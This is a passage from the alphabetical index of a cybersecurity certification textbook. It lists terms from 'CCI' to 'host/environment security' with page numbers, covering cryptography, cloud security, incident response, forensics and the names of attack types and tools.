CCI (co-channel interference), 236
CCMP. see cipher block chaining (CBC) mode
CCMP (Cipher Block Chaining Message Authentication Code Protocol), 237
cellular data connections, 356-357
cellular network, embedded systems, 333
Center for Internet Security (CIS) benchmarks, 12-13
centralized key management, 137
CER (Crossover Error Rate), 172-173
CERT. see computer emergency response team (CERT)
certificate and key management
  certificate expiration, 138
  certificate formats
    Distinguished Encoding Rules (DER), 140
    file extensions, 141
    P7B format, 141
    PKCS #12 format, 141
    Privacy-enhanced Electronic Mail (PEM), 140
  issues with, 143
  life cycle of, 137. see also key management
  Online Certificate Status Protocol (OCSP), 139-140
  OpenSSL, 142
  pinning, 140
  revocation lists, 138-139
certificate attributes, 130
certificate authority (CA)
  certificate signing request (CSR), 128-129
  defined, 126-127
  Digicert, 127
  digital certificates, 106, 126
  GlobalSign, 127
  GoDaddy, 127
  hierarchical (Intermediate CA), 127-128
  IdentTrust, 127
  online vs offline CAs, 128
  registration authorities (RAs), 128-129
  Sectigo/Comodo, 127
  single CA, 127
  Transport Layer Security (TLS), 292
  trust model, 127
certificate-based tunneling, 240
certificate chaining, 127-128
certificate formats
  encoding
    Distinguished Encoding Rules (DER), 140
    Privacy-enhanced Electronic Mail (PEM), 140
  file extensions, 141
  P7B format, 141
  PKCS #12 format, 141
certificate policies, 132
certificates, update or revoke, 478
certificates and smart cards, 180
certificate signing request (CSR), 128-129, 142
chain of custody, 485
chain of trust, 127
Challenge Handshake Authentication Protocol (CHAP), 158, 304
change control, 530, 532
change management, 530, 532
CHAP (Challenge Handshake Authentication Protocol), 158, 304
checksum
  digital signatures, 104-105
  hashing algorithms, 97
  integrity and resiliency of data, 113
Chef cloud orchestration platform, 430
Chief Information Security Officer (CISO), roles and responsibilities, 4
Chief Security Officer (CSO), 4
Chinese cyber espionage units, 20
choke firewall, 222
Choose Your Own Device (CYOD), 344
chosen ciphertext attack, 109
Chuvakin, Anton, "Magic Quadrant" reports, 328
CIA Triad. see confidentiality, integrity, availability (CIA) triad
cipher, 96
cipher block chaining (CBC) mode, 108
Cipher Block Chaining Message Authentication Code Protocol (CCMP), 237
cipher suites
  cipher block chaining (CBC) mode, 108
  counter mode, 108
  key exchange/agreement algorithm, 108
  signature algorithm, 108
  Transport Layer Security (TLS), 108, 293
ciphertext, 96
circuit-based alarm, 544
CIS benchmarks, 12-13
Cisco
  Aironet series, 245
  appliance firewall, 260
  ASA, 266
  Cloudlock, 426
  digital forensics, 487
  fog computing, 433
  IP Flow Information Export (IPFIX), 473
  logs, 168
  SAFE architecture, 216
CISO, 4
CIS-RAM. see Risk Assessment Method (CIS-RAM)
Citrix
  ICA, 413
  XenApp, 413-414
  XEN Server, 412
Citrix Endpoint Management, 345
clean agent fire suppression, 552
clean desk policy, 209
cleanup, pen test attack life cycle, 70
clickjacking, 376
Client Authentication, 132
client-based errors (400 range), 470


closed circuit televisions (CCTV), 544-545
cloud access security brokers (CASB), 272, 426-427
cloud backups, 527
cloud-based firewalls, 425
cloud-based versus on-premises risks, 55
cloud compute security
  API inspection and integrations, 420-421
  container security, 420
  instance awareness, 421
cloud computing concepts. see secure cloud solutions
cloud controls matrix, 11
cloud deployment models
  community cloud, 408-409
  hosted private cloud, 408
  private cloud, 408
  public (multi-tenant) cloud, 408
cloud firewall security, 425
Cloudflare blog, Transport Layer Security (TLS), 293
cloud networking security
  public and private subnets, 423
  virtual private cloud (VPC), 423
cloud orchestration, 430
Cloud Security Alliance (CSA)
  cloud controls matrix, 11
  enterprise reference architecture, 11
  security guidance, 11
cloud security controls
  application security, 419
  cloud access security brokers (CASB), 426-427
  cloud compute security, 420-421
  cloud firewall security, 425
  cloud networking security, 423
  cloud storage security, 421-422
  data replication, 422-423
  high availability (HA), 422-423
  identity and access management (IAM), 419-420
  secrets management, 419-420
  secure web gateway (SWG), 427
  security groups, 425-426
  VPCs and transit gateways, 424
cloud security integration and auditing, 418-419
cloud service integration, 430
cloud service models
  anything as a service (XaaS), 409-410
  consultants, 411
  geographical redundancy, 520
  infrastructure as a service (IaaS), 409, 410
  Managed Security Services Provider (MSSP), 411
  platform as a service (PaaS), 409, 410
  Security as a Service (SECaaS), 411
  software as a service (SaaS), 409
cloud service provider (CSP)
  Cloud Security Alliance (CSA), 11
  cloud security controls, 419-420
  cloud security integration and auditing, 418-419
  public (multi-tenant) cloud, 408
cloud services
  as attack vectors, 23
  digital forensics for, 496
cloud storage security
  encryption, 421-422
  permissions and resource policies, 421
cloud versus on-premises requirements, 204
clustering
  active/active (A/A), 251
  active/passive (A/P), 251
  application, 251
  virtual IP, 250
cmdlets, 395
CN (common name), 130-131
COBO. see Corporate Owned, Business Only (COBO)
co-channel interference (CCI), 236
Code Integrity (CI) policies, 394
code of conduct, 208
Code-Red worm, 84
code refactoring, 369
code reusage, 386
code review, 387
code signing, 88, 132, 393
code signing certificates, 135
cold site, 533
cold storage, 422
collisions, cryptographic attacks, 117-118
colocation cages, 548-549
command and control (C2)
  penetration testing, 70
  remote access Trojans (RATs), 87
  weaponization code, 460
command injection attack, 379
command-line interface (CLI), 419
command-line packet capture utility, 42-43
command-line tools, topology discovery (footprinting), 36-37
commercial threat intelligence platforms, 26-27
common log format (CLF), 470
common name (CN), 130-131
common vulnerabilities and exposures (CVE)
  Common Vulnerabilities Scoring System (CVSS), 59-60
  Mitre, 30
  network vulnerability tests (NVTs), 59
  plug-ins, 59
  Security Content Application Protocol (SCAP), 59
  vulnerability feed, 59
Common Vulnerabilities Scoring System (CVSS), 59-60
communication considerations for embedded systems, 333-334
communication plan, incident response (IR), 458
community cloud, 408-409
compensating controls, 10
competitors, threat actors, 21
compiled code, 387
computer-based training (CBT), 211
computer emergency response team (CERT), 21-22, 457, 458-459
Computer Security Act (1987), 13

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-8 | Index

computer security incident response team (CSIRT), 457, 458-459
compute services, 420-421
conditional access, 201-202
conduct policy
  acceptable use policy (AUP), 208
  clean desk policy, 209
  code of conduct, 208
  personally owned device use, 209
  social media analysis, 208
conferences, threat research sources, 28
confidential (secret) data, 440
confidentiality, integrity, availability (CIA) triad
  authentication design, 151
  information security roles, 2
  privacy and data sensitivity concepts, 438
Configuration Item (CI), 530
configuration management system (CMS), 530-531
configuration review, 63
Conficker worm, 84
constraints, embedded systems, 331-332
consultants, 411
consumer-specific, cross-sector (horizontal) legislation, 13-14
contactless point-of-sale (PoS), 360
containerization, content management, 353
container security, 420
container virtualization, 413-414
containment phase, 456-457
content filter, 272
content filter configuration changes
  data loss prevention (DLP), 477
  mobile device management (MDM), 478
  update or revoke certificates, 478
content management, 353
Content Security Policy (CSP), 385
context-aware authentication, 349
continuity of operation planning (COOP), 463, 508
continuous authentications, 175
continuous delivery, 402
continuous deployment, 402
continuous integration (CI), 402
continuous monitoring, 402-403
continuous validation, 403
control block, Python, 391-392
control diversity, 533-534
controller and access point security, 236-237
control plane, 432
control risk, 505
cookies
  malware classifications, 85
  nonpersistent (session), 374
  persistent (closed), 374
  secure cookies, 384
Coordinated Universal Time (UTC), 289, 486
COPE. see Corporate Owned, Personally-Enabled (COPE)
copy backups, 525
Corporate Owned, Business Only (COBO), 344
Corporate Owned, Personally-Enabled (COPE), 344
corrective control, 9, 10
correlation rules, 466
counterfeit card reader, 543
counterintelligence, 487-488
counter mode, 108
cousin domains, 79
covert channel, remote access Trojans (RATs), 87
crash dump, 492
Create-Thread, 395
credential databases, 77
credential dumping, 394
credentialed scans, 61
credential harvesting, 82
credential management, policies for personnel, 183
credential stealing, 381
criminal syndicates, threat actors, 21
critical (top secret) data, 440
critical systems, identification of, 510
cross-certification, 128
Crossover Error Rate (CER), 172-173
cross-site request forgery (XSRF)/(CSRF), 375-376
cross-site scripting (XSS) attacks, 376-377
cryptanalysis, 96
cryptoanalysis, 116
cryptocurrency mining, 89
crypto diversity, 534
crypto erase, 554
cryptographic attacks
  birthday attacks, 117-118
  collisions, 117-118
  downgrade attacks, 116-117
  key stretching, 117
  man-in-the-middle attack (MitM), 116-117
  salting, 117
cryptographic ciphers
  elliptic curve cryptography (ECC), 102
  encryption ciphers and keys, 98
  hashing algorithms
    checksum, 97-98
    digital signatures, 104-105
cryptographic concepts
  asymmetric cipher, 96, 100-102
  cipher, 96
  ciphertext, 96
  cryptanalysis, 96
  defined, 96
  modes of operations
    Additional Data (AEAD) mode, 109
    authenticated encryption, 109
    chosen ciphertext attack, 109
    cipher suites, 108
    digital certificates, 106
    digital envelopes and key exchange, 105-106
    digital signatures, 104-105
    message authentication code (MAC), 109
    perfect forward secrecy, 107-108
  plaintext, 96
  public key cryptography algorithms, 101-102
  symmetric cipher, 96, 99-100

Index | I-9

cryptographic longevity, 116
cryptographic performance limitations, 113-114
cryptographic primitive, 111-112
cryptographic technologies
  blockchain, 121
  homomorphic encryption, 121
  lightweight cryptography, 121
  quantum and post-quantum, 120-121
  steganography, 121-122
cryptographic use cases
  authentication and non-repudiation, 111-112
  confidentiality, 112
  integrity and resiliency of data, 113
cryptographic weaknesses
  performance limitations, 113-114
  security limitations
    entropy and weak keys, 114-115
    predictability and reuse, 115
cryptojacking, 89
Cryptolocker, 89
crypto-malware, 89
crypto-mining, 86-87, 89
CSA. see Cloud Security Alliance (CSA)
CSF. see cybersecurity framework (CSF)
CSO. see Chief Security Officer (CSO)
CSP. see cloud service provider (CSP)
CSR, 128-129, 142
CTF, 210-211
CTI, 26
curl, network reconnaissance tools, 42
customer data, 441
CVE, 30, 59-60
CVSS, 59-60
cyber-attack life cycles, 20
cyber incident response team (CIRT)
  communication plan, 458
  data sources, security and information event management (SIEM), 466-469
  human resources (HR), 458
  identification of incidents, 465-466
  incident response plan (IRP), 458-459
  legal department, 457-458
  marketing team, 458
  stakeholder management, 458
cyber kill chain attack framework, 459-460
cybersecurity assurance, security controls, 8-10
cybersecurity framework (CSF), 3, 10-11
cybersecurity resilience
  backup strategies
    backup media types, 526-527
    backups and retention policy, 522-523
    backup storage issues, 526
    copy backups, 525
    differential backups, 524-525
    full backups, 524
    incremental backups, 524-525
    non-persistence environment, 528
    order of restoration, 527-528
    snapshots and images, 525-526
  guidelines for implementing, 537
  redundancy strategies
    asynchronous and synchronous replication, 520
    disk redundancy, 519
    fault tolerance and redundancy, 517
    geographical dispersal, 520
    geographical redundancy, 520
    geographical replication, 520
    high availability, 516-517
    maximum tolerable downtime (MTD), 516
    network redundancy, 518
    power redundancy, 517-518
    scalability and elasticity, 516-517
  strategies
    active defenses, 534-535
    asset management, 531
    change control, 530, 532
    change management, 530, 532
    configuration management system (CMS), 530-531
    crypto diversity, 534
    deception and disruption strategies, 534-535
    defense in depth, 533-534
    honeyfiles, honey nets, honey ports, 534-535
    Information Technology Infrastructure (ITIL), 530-531
    layered security, 533-534
    site resiliency, 532-533
    technology and control diversity, 533-534
    vendor diversity, 534
cyber threat intelligence (CTI), 26, 479
cyber weapons, 20-21
CYOD. see Choose Your Own Device (CYOD)

D
DAC (discretionary access control), 199
DarkMatter, 88
dark net, 25-26
dark web, 25-26
dashboard, SIEM, 466-467
data acquisition, 490-491
data at rest, 112, 447
database, geographical redundancy, 520
database deidentification methods
  aggregation/banding technique, 452
  data masking, 452
  hashing, 452
  salting, 452
  tokenization, 452

I-10 | Index

database management systems (DBMS), 451-452
data breaches, 53, 443-444
data classification, 440-441
data controller, 439-440
data custodian, 439
data-driven standard operating procedure (SOP), 459
data exfiltration
  data privacy and protection controls, 448-449
  impact of, 53
data exposure, 385
data governance team. see privacy and data sensitivity concepts
data historian, 334
data in processing, 447-448
data integrity, incident response plan (IRP), 459
data in transit (motion), 447
data-in-transit (transport encryption), 112
data in use, 447
data loss, impact of, 53
data loss prevention (DLP)
  alert only, 449
  block, 450
  content filter configuration changes, 477
  endpoint protection, 328
  quarantine, 450
  secure web gateway (SWG), 272
  tombstone, 450
data masking, database deidentification methods, 452
data minimization, 451
data owner (senior executive) role, 439
data plane, 432
data privacy and protection controls
  database deidentification methods, 451-452
  database encryption, 447
  data exfiltration, 448-449
  data loss prevention (DLP), 449-450
  guidelines for, 454
  privacy enhancing technologies, 451
  rights management services, 450
  states of data, 447-448
data privacy and sensitivity concepts
  data breaches, 443-444
  data classification, 440-441
  data retention, 442-443
  data roles and responsibilities, 439-440
  data sharing, 444-445
  data sovereignty, 443
  data types, 441-442
  geographical considerations, 443
  information life cycle management, 438-439
  privacy breaches, 443-444
  privacy notices, 442
  privacy terms of agreement, 444-445
  privacy vs security, 438
data privacy officer (DPO), 439
data processor, 439-440
data protection controls. see data privacy and protection controls
data recovery, 495
data remnants, 552
data replication, 422-423
data retention, 442-443
data roles and responsibilities
  data controller, 439-440
  data custodian, 439
  data owner (senior executive) role, 439
  data privacy officer (DPO), 439
  data processor, 439-440
  data steward, 439
data sanitization tools
  crypto erase, 554
  Instant Secure Erase (ISE), 554
  overwriting, 553
  Secure Erase (SE), 554
data sensitivity concepts. see privacy and data sensitivity concepts
data sharing and use agreement, 444-445
data sources
  log files
    application log files, 470-471
    authentication logs, 470
    network log files, 469
    system and security logs, 469
    vulnerability scan outputs, 470
  metadata, 471-472
  network data sources, 472-473
  security and information event management (SIEM)
    correlation rules and retention policy, 466
    dashboard, 466-467
    logging platforms, 468-469
    sensitivity and alerts, 467
    sensors, 467
    trend analysis, 468
data sovereignty, 443
data steward, 439
data storage, third-party risks, 55
data storage performance tiers, 422
data types, 441-442
dcfldd, 493
DDoS. see distributed denial of service (DDoS)
dead code, 386
deauthentication attack, 244
Debian Linux, 114-115
Debian OpenSSL, 114-115
decentralized key management, 137
deception strategies, 534-535
default account, 184-185
default security groups, 185
default settings, weak host configurations, 51
defense in depth, 533-534
degaussing, 553
deidentification process, 451
demilitarized zone (DMZ)
  environmental security, 549
  network topology and zones, 221-223
  physical site security controls, 541
  screened hosts, 223
  screened subnet, 222
  triple-homed firewall, 222-223
denial of service (DoS) attacks

Index | I-11

  application programming interfaces (APIs), 374
  DNS security, 287
  network address allocation, 284
  open-source spoofing tool, 45
  Wi-Fi protected setup (WPS), 239
Department of Defense Cyber Exchange, 12
deployment and automation concepts
  application development, deployment, and automation, 399
  automation/scripting release paradigms, 401-403
  provisioning control, 401
  secure application development environments, 399
  software diversity, 403
  version control, 401
deployment models. see mobile device deployment models
DER (Distinguished Encoding Rules), 140
destination NAT/port forwarding, 264-265
detection time, incident response plan (IRP), 459
detective control, 9, 10
deterrent controls, 10
Developer Enterprise Program, 345
development, security, and operations (DevSecOps), 5-6
development and operations (DevOps), 5-6
development environments
  development, 400
  integrity measurement, 401
  production, 400
  sandboxing, 401
  secure configuration baseline, 401
  staging, 400
  test/integration, 400
device accounts, credential policies for, 186-187
device discovery, 358
Device Enrollment Program, 345
Device Provisioning Protocol (DPP), 239
DevOps. see development and operations (DevOps)
DevSecOps. see development, security, and operations (DevSecOps)
DGA (domain generation algorithm), 91
D-H (Diffie-Hellman) key agreements, 107-108
DHCP. see Dynamic Host Configuration Protocol (DHCP)
DHE. see Diffie-Hellman Ephemeral mode (DHE or EDH)
DHE or EDH (Diffie-Hellman Ephemeral mode), 107, 293
Diamond Model of Intrusion Analysis, 461
dictionary attacks, 160
differential backups, 524-525
Diffie-Hellman (D-H) key agreements, 107-108
Diffie-Hellman Ephemeral mode (DHE or EDH), 107, 293
Diffserv, 252
Digicert, 127
digital certificates
  attributes of, 130
  certificate authority (CA) issuing, 126-127
  Client Authentication, 132
  Code Signing, 132
  code signing certificates, 135
  defined, 126
  Email Protection, 132
  email/user certificates, 134
  Extended Key Usage (EKU), 132
  issues with, 143
  Key Usage attribute, 132
  machine/computer certificates, 134
  modes of operations, 106
  policies, 132
  root certificates, 135
  secure remote access protocols, 307
  self-signed certificates, 135
  Server Authentication, 132
  standards for, 129
  types of, 132
  web server certificate types, 132-133
  see also certificate and key management
digital envelopes, 105-106
digital forensics
  documentation
    counterintelligence, 487-488
    digital forensics reports, 485
    e-discovery, 485-486
    event logs, 487
    network traffic, 487
    strategic intelligence, 487-488
    timelines, 486-487, 494
    video interviews, 486
    witness interviews, 486
  evidence acquisition
    artifacts and data recovery, 495
    cache data acquisition, 495
    of Cloud data, 496
    data acquisition, 490-491
    digital forensics software, 491
    disk image acquisition, 493
    firmware, 496
    network data acquisition, 495
    preservation and integrity of evidence, 494
    snapshot, 495
    system memory acquisition, 491-493
  guidelines for, 498
  key aspects of, 484-485
digital forensics reports, 485
digital forensics software, 491
Digital Guardian, data loss prevention (DLP), 450
Digital Signature Algorithm (DSA), 105
digital signatures, 104-105
digital tape systems, 527
direct access, 22
direct access attack vector, 22
directory services, 202-203
directory traversal injection attack, 379

I-12 | Index

disassociation and replay attacks, 244-245
disaster recovery plans (DRPs), 462-463, 512
disasters
  environmental, 511
  internal vs external, 511
  person-made, 511
discretionary access control (DAC), 199
disk, backup media types, 527
disk encryption, 320-321
disk image acquisition, 493
disk redundancy
  multipath, 519
  Redundant Array of Independent Disks (RAID), 519
disruption strategies, 535
Distinguished Encoding Rules (DER), 140
distinguished name (DN), 202
distributed denial of service (DDoS)
  load balancers, 247
  mitigation, 248-249
  remote access Trojans (RATs), 86-87
distributed reflection DoS (DRDoS), 247
DLL (dynamic link library), 84
DLL injection, 369
DLP (data loss prevention), 272
DMZ. see demilitarized zone (DMZ)
DN (distinguished name), 202
DNS. see domain name system (DNS)
DNS amplification attack, 248
DNS client cache poisoning, 286
dnsenum, network reconnaissance tools, 41
DNS event logs, 470
DNS poisoning
  DNS client cache poisoning, 286
  DNS server cache poisoning, 287
  man-in-the-middle attack (MitM), 286
DNSSEC (DNS Security Extensions), 287-288
DNS security, 287-288
DNS Security Extensions (DNSSEC), 287-288
DNS server cache poisoning, 287
DNS sinkhole, 535
Docker, 413-414, 420
documentation
  counterintelligence, 487-488
  in digital forensics, 484
  digital forensics reports, 485
  e-discovery, 485-486
  event logs, 487
  network traffic, 487
  strategic intelligence, 487-488
  timelines, 486-487, 494
  video interviews, 486
  witness interviews, 486
Document Object Model (DOM), 377
domain generation algorithm (DGA), 91
domain hijacking, 285-286
domain name resolution
  domain hijacking, 285-286
  domain reputation, 286
  uniform resource locator (URL) redirection, 286
domain name system (DNS)
  configuration baselines, 326
  domain name resolution, 285-286
  footprinting, 287
  network appliances, 217-218
  poisoning, 286-287
  security, 287-288
domain reputation, 286
domain validation (DV), 132-133
doppelganger domains, 79
DoS. see denial of service (DoS) attacks
downgrade attacks, cryptographic attacks, 116-117
downtime, incident response plan (IRP), 459
DPP (Device Provisioning Protocol), 239
Dragonfly handshake, 238-239
DRDoS (distributed reflection DoS), 247
driver manipulation, 369
drones/unmanned aerial vehicle (UAV), 69-70, 338, 545
dry-pipe, 552
DSA (Digital Signature Algorithm), 105
due diligence, 13
due process, 484
dump files, 471
dumpster diving, 76
duress alarms, 544
DV (domain validation), 132-133
dynamic code analysis, 387-388
Dynamic Host Configuration Protocol (DHCP), 230, 284-285
dynamic link library (DLL)
  DLL injection, 369
  fileless malware, 84
  man-in-the-browser (MitB) attack, 397
dynamic resource allocation, 420

E
EAP (extensible authentication protocol), 165-166, 240, 241-242
EAPoL (EAP over LAN), 167
EAP-TLS, 241-242
EAP-Tunneled TLS (EAP-TTLS), 242-243
EAP with Flexible Authentication via Secure Tunneling (EAP-FAST), 243
east-west traffic considerations, 224
Easy Connect method, 239
eavesdropping, 227
ECC (elliptic curve cryptography), 102, 105
economic effects, incident response plan (IRP), 459
edge computing, 432-433
edge devices, 433
edge gateways, 433
EDH. see Diffie-Hellman Ephemeral mode (DHE or EDH)
e-discovery, 485-486
eduroam network, 243
egress traffic filtering, 256
EIGRP (Enhanced Interior Gateway Routing Protocol), 219
EKU (Extended Key Usage), 132
Electromagnetic Interference (EMI), 551
Electronically Stored Information (ESI), 485-486

Index | I-13

electronic locks, 542
elliptic curve cryptography (ECC)
  Digital Signature Algorithm (DSA), 105
  public key cryptography algorithms, 102
Elliptic Curve Diffie-Hellman Ephemeral mode, 293
email, as attack vectors, 23
email mailbox servers, 217
email metadata, 471-472
Email Protection, 132
email services
  secure IMAP (IMAPS), 297
  Secure/Multipurpose Internet Mail Extensions (S/MIME), 297-298
  Secure POP (POP3S), 297
  Secure SMTP (SMTPS), 296
  Simple Mail Transfer Protocol (SMTP), 296-297
email/user certificates, 134
embedded system security implications
  communication considerations, 333-334
  constraints of, 331-332
  firmware code control, 339
  industrial control systems, 334-335
  Internet of Things (IoT), 335-336
  logic controllers, 332
  medical devices, 338
  multifunction printers (MFPs), 337
  network segmentation, 338
  specialized systems for facility automation, 336-337
  vehicles and drones, 338
  Voice over IP (VoIP), 337
  wrappers, 339
Encapsulation Security Payload (ESP), 305
EnCase Forensic, 493
encoding
  Distinguished Encoding Rules (DER), 140
  Privacy-enhanced Electronic Mail (PEM), 140
encryption
  cloud storage security, 421-422
  full disk encryption, 421
encryption ciphers and keys, 98
end of life (EOL), 322-323
end of service life (EOSL), 322-323
endpoints
  configuration changes
    application allow and block lists, 478-479
    quarantine, 479
  endpoint agents, 449
  endpoint protection
    anti-malware software, 327
    anti-virus software (A-V), 327
    data loss prevention (DLP), 328
    endpoint protection deployment, 328
    endpoint protection platform (EPP), 327-328
    host-based intrusion detection/prevention (HIDS)(HIPS), 327
  endpoint protection deployment, 328
  endpoint protection platform (EPP), 90, 327-328
  endpoint security
    antivirus response, 329
    baseline configuration and registry setting, 326
    cybersecurity resilience, 533
    endpoint protection, 327-328
    hardening systems, 325-326
    next-generation endpoint protection, 328-329
    patch management, 326-327
  gateway, 424
  interface, 424
  restricting, 22
  virtual private cloud (VPC), 424
Enhanced Interior Gateway Routing Protocol (EIGRP), 219
enterprise/IEEE 802.1X authentication, 240-241
enterprise mobility management (EMM)
  Android, 346-348
  Apple’s iOS, 345-346
  mobile application management (MAM), 345
  mobile device management (MDM), 345
  unified endpoint management (UEM), 345
enterprise reference architecture, defined, 11
enterprise risk management (ERM), 501
  see also risk management
enterprise single sign-on (SSO), 295
entropy and weak keys, 114-115
entry/exit point security, 541
environmental disasters, 511
environmental security. see host/environment security
ephemeral session keys, 107-108, 293
EPP (endpoint protection platform), 90
eradication and recovery phase, 456-457
error handling, 367, 383
escrow of keys, 138
ESP (Encapsulation Security Payload), 305
ethical hacking, 67
European Economic Area, 443
EV (extended validation), 133
event logs, 487
evidence, preservation and integrity of, 494
evidence acquisition
  artifacts and data recovery, 495
  cache data acquisition, 495
  of Cloud data, 496
  data acquisition, 490-491
  digital forensics software, 491
  disk image acquisition, 493
  firmware, 496
  network data acquisition, 495
  preservation and integrity of evidence, 494
  snapshot, 495
  system memory acquisition, 491-493
evidence in digital forensics, 484

I-14 | Index

evil twins, 243-244
exceptions handling, 385
Exchange mail users, 134
execution control
  allow list, 393
  block list, 393
  code signing, 393
  Linux, 394
  OS-based execution control, 393-394
  Python, 392
  Windows, 394
exercise types, blue, purple, red, white team, 68-69
Explicit TLS (FTPES), 296
exploitation frameworks
  browser exploitation frameworks, 46
  fireELF, 46
  Metasploit, 45-46
  Pacu, 46
  RouterSploit, 46
  Sn1per, 46
  Zed Attack Proxy (ZAP), 46
exposure factor (EF), 502
Extended Key Usage (EKU), 132
extended validation (EV), 133
extensible authentication protocol (EAP), 165-166, 240, 241-242
Extensible Configuration Checklist Description Format (XCCDF), 63
extensible markup language (XML) injection, 378
external media protections, 350
external threat
  actor/agent, 19
  malicious, 19
  risk management, 501
extranet zones, 220

F
facial recognition
  iris scan, 174
  mobile device management (MDM), 348
  retinal scan, 174
facility automation, 336-337
factors. see authentication factors
failover, 250
Failure to Enroll Rate (FER), 173
fake telemetry data, 535
False Acceptance Rate (FAR), 172
false flag campaigns, 21
false negative alerts, 61-62, 271
false positive alerts, 61-62, 271
False Rejection Rate (FRR), 172
FAR (False Acceptance Rate), 172
Faraday Cages, 550
fast-flux, 91
Fast Identity Online (FIDO), 168
fault tolerance and redundancy, 517
FDE. see full disk encryption
Federal Information Processing Standards (FIPS), 11
federation, 203
fencing, site security, 541
FER (Failure to Enroll Rate), 173
Fibre Channel, 520
FIDO (Fast Identity Online), 168
field programmable gate array (FPGA), 332
file/code repositories, virustotal.com, 30
file cookies, 292
file encryption (data-at-rest), 112
file extensions, 141
file integrity monitoring (FIM), 272
fileless malware, 84-85
file manipulation
  cat command, 278
  head and tail commands, 278
  logger command, 278-279
file metadata, 471
file system permissions, 200-201
File Transfer Protocol (FTP), 295
file transfer services
  Explicit TLS (FTPES), 296
  File Transfer Protocol (FTP), 295
  FTP over SSL (FTPS), 296
  Implicit TLS (FTPS), 296
  SSH FTP (SFTP), 296
firmware, software vulnerabilities, 50
firmware code control, 339
filter expressions, 42-43
FIM (file integrity monitoring), 272
financial and reputation loss, impact of, 54
financial information, 442
fingerprinting, service discovery, 39-40
fingerprint reader, 348
fingerprint recognition, 173
fingerprint scanners, 173
FIPS. see Federal Information Processing Standards (FIPS)
fire detection and suppression, 551-552
fireELF, exploitation frameworks, 46
FireEye
  network reconnaissance tools, 41
  system memory acquisition, 492
  threat intelligence providers, 27
  threat actors, 21
firewall implementation
  application-based firewalls, 260
  firewall appliances, 259-260
  firewall router appliance, 260
firewalls
  access control lists (ACL), 262-263
  application aware firewalls, 258
  application-based firewalls, 260
  application firewall, 260
  cloud firewall security, 425
  configuration changes, 476-477
  firewall implementation, 259-260
  firewall router appliance, 260
  host-based firewall, 260
  isolation-based containment, 475
  native cloud application-aware firewalls, 425
  network address translation (NAT), 263-265
  network appliances, 217-218
  network log files, 469
  network operating system (NOS) firewall, 260
  next-generation firewall integration, 329

Index | I-15

  next-generation firewalls (NGFW), 271-272
  open-source vs. proprietary, 266
  packet filtering firewalls, 256
  packet injection and replay, 44
  segmentation-based containment, 475
  stateful inspection firewalls, 257-259
  threat intelligence sources, 25
  unified threat management (UTM), 271-272
  virtual firewalls, 265
  web application firewalls, 273, 425
firmware
  digital forensics, 496
  over the air updates, 361
first responder, 465
flash drive security, 321-322, 552
fog computing, 432-433
fog nodes, 433
footprinting, 69
footprinting (topology discovery), 36-37
forced proxy, 261
Forcepoint, 426
forensic procedures, 463
forensics. see digital forensics
Forensic Toolkit (FTK), 491, 493
forms mechanism (POST), 292
forward proxy CASBs, 427
forward proxy servers, 261-262
4G cellular, 333
FQDN. see fully qualified domain name (FQDN)
Freenet, 25
frequency-based trend analysis, 468
F-Response TACTICAL, 492
FRR (False Rejection Rate), 172
FTP (File Transfer Protocol), 295
FTPES (Explicit TLS), 296
FTP over SSL (FTPS), 296
FTPS (FTP over SSL), 296
FTPS (Implicit TLS), 296
full backups, 524
full device encryption, 350
full disk encryption, 421
full disk encryption (FDE), 320-321
full-scale exercises, 512
full tunnel, VPN client configuration, 309
fully qualified domain name (FQDN), 128-129, 130, 285
functional exercises, 512
functional recovery plans, 512
Function as a Service (FaaS)/serverless architecture, 430-431
funding, of threat actors, 19
fuzzers, 387-388
fuzzing, 387-388

G
gait analysis, 175
Galois Counter Mode, 293
Gartner, “Magic Quadrant” reports, 328
gateway endpoints, 424
gateways, site security, 542-543
GCMP (AES Galois Counter Mode Protocol), 238
GDPR. see General Data Protection Regulation (GDPR)
General Data Protection Regulation (GDPR), 13-14, 442, 443
generators, 518
generic accounts, 186-187
generic administrator account management, 185
geofencing, 351
geographical considerations, data security, 443
geographical dispersal, 520
geographical identification metadata, 352
geographical redundancy, 520
geographical replication, 520
geolocation, 193
geo-redundant storage (GRS), 423
Get-Help cmdlet, 392
global positioning system (GPS), 350-351, 357
GlobalSign, 127
GoDaddy, 127
Google
  App Engine, 409
  Chrome, 470
  Cloud to Device Messaging, 361
  firewall service, 419
  Google Pay, 360
  Google Play, 346
  G Suite, 409
  Managed Google Play, 352
  Play Protect, 347
  Safari, 470
government data, 442
GPOs (group policy objects), 191
GPS tagging, 352
Gramm-Leach-Bliley Act (GLBA), 14, 504
gray box, 68
gray hat hacker, 20
grayware
  adware, 85
  potentially unwanted programs (PUPs), 82, 83
Greenbone Community Edition, vulnerability manager, 59
Greenbone Networks, OpenVAS scan engine, 58, 59, 61
grep command, 279
group account, 184
group policy objects (GPOs), 191, 394
guest accounts, 183-184
guest operating systems, 411
GUI topology discovery tools, 36

H
hackers, 20
hacker teams, 20
hacking the human, 74
hacktivists
  defined, 20
  influence campaigns, 82
Hak5 Pineapple, 69
halon gas-based fire suppression, 552
hard disk drives (HDD)
  data destruction, 552-553
  Instant Secure Erase (ISE), 554
  nonvolatile storage media, 493
  Secure Erase (SE), 554
  secure firmware, implementing, 320
hardened PDS, 550
hardening systems, 325-326

I-16 | Index

hardware root of trust (RoT), 318-319
hardware security module (HSM), 165, 422
Hashcat, 161
hashing
  database deidentification methods, 452
  digital signatures, 104-105
  hashing algorithms, 97-98
hashing algorithms
  checksum, 97, 104-105
  cryptographic ciphers, 97-98
  digital signatures, 104-105
  hashing, 97-98, 104-105
  message digest algorithm (MDA), 97-98
  secure hash algorithm (SHA), 97-98
head commands, 278
health information, 441-442
Health Insurance Portability and Accountability Act (HIPAA), 14, 444, 504
heating, ventilation, air conditioning (HVAC), 550
heat map risk matrix, 503, 506
heat maps, 236
heuristics, 271
hibernation file, 492-493
HIDS (host-related intrusion detection systems), 272
hierarchical (Intermediate CA), 127-128
high availability (HA), 422-423, 516-517
HMAC-based One-Time Password Algorithm (HOTP), 168-169
hoaxes, 78-79
home automation devices, 336
Homeland Security Act, 504
homomorphic encryption, 121
honeyfiles, honey nets, honey ports, 534-535
horizontal (consumer-specific, cross-sector) legislation, 13-14
horizontal brute force online attacks, 159
horizontal privilege escalation, 366
host-based firewall, 260
host-based intrusion detection/prevention (HIDS)(HIPS), 327
hosted private cloud, 408
host/environment security
  data sanitization tools, 553-554
  Faraday Cages, 550
  fire detection and suppression, 551-552
  hot/cold aisles, 551
  HVAC, 550
  protected distribution, 550
